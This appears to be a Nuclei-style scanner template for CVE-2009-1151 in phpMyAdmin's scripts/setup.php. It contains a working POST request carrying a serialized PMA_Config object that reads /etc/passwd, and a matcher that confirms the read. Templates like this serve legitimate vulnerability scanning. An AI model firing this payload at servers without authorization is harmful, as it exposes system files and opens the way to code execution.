id: CVE-2009-1151 info: name: PhpMyAdmin Scripts/setup.php Deserialization Vulnerability author: princechaddha severity: high description: Setup script used to generate configuration can be fooled using a crafted POST request to include arbitrary PHP code in generated configuration file. Combined with ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code. reference: https://www.phpmyadmin.net/security/PMASA-2009-3/ vulhub: https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433 tags: phpmyadmin,rce,deserialization requests: - raw: - | POST /scripts/setup.php HTTP/1.1 Host: {{Hostname}} Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 80 action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";} matchers-condition: and matchers: - type: status status: - 200 - type: regex regex: - "root:[x*]:0:0:"